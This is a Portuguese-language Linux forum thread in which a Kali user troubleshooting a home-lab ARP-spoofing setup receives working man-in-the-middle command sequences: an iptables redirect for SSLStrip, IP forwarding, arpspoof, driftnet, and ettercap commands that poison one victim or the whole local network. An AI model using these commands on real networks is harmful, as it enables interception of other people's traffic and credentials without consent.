arpspoof

1. arpspoof

msfcl31
msfcl3i

(usa Kali)

Enviado em 01/03/2015 - 02:22h

iai galeta blz, bem montei um laboratorio em casa, e estou conhecendo melhor a ferramenta de sniff de rede, estou utilizando o arpspoof, so que esta acontecendo um proplema, na minha maquina digito,

1=> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
comando do iptables para fazer o redirecionamento de pacotes.
2=> echo 1 > /proc/sys/net/ipv4/ip_forward
para ativar o redirecionamento de pacotes
3=> arpspoof -i wlan0 -t < IP do alvo> <gateway IP>
4=> arpspoof -i wlan0 -t <gateway IP> < IP do alvo>
5=> driftnet -i wlan0
digito esta sequencia de comandos ai, aparentemente deveria funcionar tudo ok, mas, o trafego que capturo e o da minha propria maquina e não o trafego da maquina alvo, o que era pra acontecer, não sei o que esta acontecendo, a maquina alvo esta conectada via wi-fi e a minha maquina tabém, mas acho que isso não influencia neste ataque MAN IN THE MIDDLE.
alguém pode me ajudar ?. E como faço para redirecionar todo o trafego pra mim, de todos que estão conectados no meu roteador de um vez so. DESDE JÁ AGRADEÇO A TOSDOS, E VIVA O LINUX @/






  


2. Re: arpspoof

Douglas
DouglasJC

(usa Arch Linux)

Enviado em 02/07/2015 - 22:33h

O primeiro passo que você executou (regra do iptables) serve para redirecionar todo o tráfego que chega na porta 80 da sua estação de ataque para uma porta x onde, geralmente, uma ferramenta como o SSLStrip está ouvindo conexões e realizando a manipulação de pacotes para forçar o uso do protocolo HTTP na máquina da vítima. Não sei se é esta a sua intenção, mas no caso de um simples ataque de MITM este comando não é necessário. Por outro lado, os passos 2, 3, 4 já seriam suficientes para iniciar o ataque. Você experimentou utilizar outros sniffers de rede para verificar se conseguia capturar o tráfego da outra máquina? Ex.: tcpdump, Wireshark.

De qualquer forma, abaixo está a sequência de comandos que eu geralmente utilizo nos meus testes:

1) echo 1 > /proc/sys/net/ipv4/ip_forward
2) ettercap -Ti <interface> -M arp:remote /<ip_gateway/ /ip_vítima/
Ex.: ettercap -Ti wlan0 -M arp:remote /192.168.1.1/ /192.168.1.15/

Após isso, basta executar um sniffer como o Wireshark e iniciar a captura de pacotes na interface de rede que você utilizou para enviar os pacotes ARP. Para facilitar a identificação, você pode definir um filtro no Wireshark como: ip.src == 192.168.1.15.

Espero ter ajudado. Abraços.


3. Re: arpspoof

Iuri Finger
vivalatequila

(usa Debian)

Enviado em 09/10/2015 - 17:31h

DouglasJC escreveu:

O primeiro passo que você executou (regra do iptables) serve para redirecionar todo o tráfego que chega na porta 80 da sua estação de ataque para uma porta x onde, geralmente, uma ferramenta como o SSLStrip está ouvindo conexões e realizando a manipulação de pacotes para forçar o uso do protocolo HTTP na máquina da vítima. Não sei se é esta a sua intenção, mas no caso de um simples ataque de MITM este comando não é necessário. Por outro lado, os passos 2, 3, 4 já seriam suficientes para iniciar o ataque. Você experimentou utilizar outros sniffers de rede para verificar se conseguia capturar o tráfego da outra máquina? Ex.: tcpdump, Wireshark.

De qualquer forma, abaixo está a sequência de comandos que eu geralmente utilizo nos meus testes:

1) echo 1 > /proc/sys/net/ipv4/ip_forward
2) ettercap -Ti <interface> -M arp:remote /<ip_gateway/ /ip_vítima/
Ex.: ettercap -Ti wlan0 -M arp:remote /192.168.1.1/ /192.168.1.15/

Após isso, basta executar um sniffer como o Wireshark e iniciar a captura de pacotes na interface de rede que você utilizou para enviar os pacotes ARP. Para facilitar a identificação, você pode definir um filtro no Wireshark como: ip.src == 192.168.1.15.

Espero ter ajudado. Abraços.


Quando eu reinicio o kali, aquela regra criada no iptables volta para default ou não? pq comigo aconteceu a mesma coisa e não consigo encontrar solu&#263;ão. Acredito que seja essa regra que está afetando a comunica&#263;ão. Também só escuto a minha máquina.




4. Pra redirecionar toda rede

Tassio cerqueira
lZangotl

(usa Kali)

Enviado em 06/06/2016 - 10:13h

ettercap -T -q -M arp -i wlan0 ou eth0 -P arp_spoof ///
-T = modo texto
-q = modo promissor
-i = interface da rede
-P = plugins



OBs: kali linux 2.0






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts